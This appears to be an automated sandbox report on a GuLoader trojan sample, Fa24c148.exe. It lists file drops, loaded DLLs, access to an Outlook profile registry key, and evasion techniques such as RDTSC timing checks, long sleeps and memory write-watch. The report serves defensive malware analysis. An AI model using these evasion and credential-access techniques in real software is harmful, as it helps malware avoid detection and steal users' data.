Sample file is different than original file name gathered from version info
Source: Fa24c148.exe, 00000004.00000002.2951000648.00000000333D7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Fa24c148.exe
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F42000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Fa24c148.exe
Uses 32bit PE files
Source: Fa24c148.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/10@5/5
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00404457 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404457
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Program Files (x86)\shaw Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Users\user\AppData\Local\Temp\nsjC8A7.tmp Jump to behavior
Source: Fa24c148.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Fa24c148.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Fa24c148.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\Fa24c148.exe File read: C:\Users\user\Desktop\Fa24c148.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"
Source: C:\Users\user\Desktop\Fa24c148.exe Process created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"
Source: C:\Users\user\Desktop\Fa24c148.exe Process created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.2029869938.0000000005425000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
Drops PE files
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\Fa24c148.exe API/Special instruction interceptor: Address: 5C2938D
Source: C:\Users\user\Desktop\Fa24c148.exe API/Special instruction interceptor: Address: 1FA938D
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Fa24c148.exe RDTSC instruction interceptor: First address: 5BEAA11 second address: 5BEAA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4458D311FAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fa24c148.exe RDTSC instruction interceptor: First address: 1F6AA11 second address: 1F6AA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4458FAFEFAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Fa24c148.exe Memory allocated: 120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Memory allocated: 335C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Memory allocated: 33230000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595967 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595516 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595391 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594813 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594359 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594250 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 594141 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Fa24c148.exe Window / User API: threadDelayed 7648 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Window / User API: threadDelayed 2183 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Fa24c148.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Fa24c148.exe API coverage: 1.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -25825441703193356s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 4484 Thread sleep count: 7648 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 4484 Thread sleep count: 2183 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -599078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -598110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -597110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -596110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595967s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -595063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316 Thread sleep time: -594141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Thread delayed: delay time: 599547 Jump to behavior
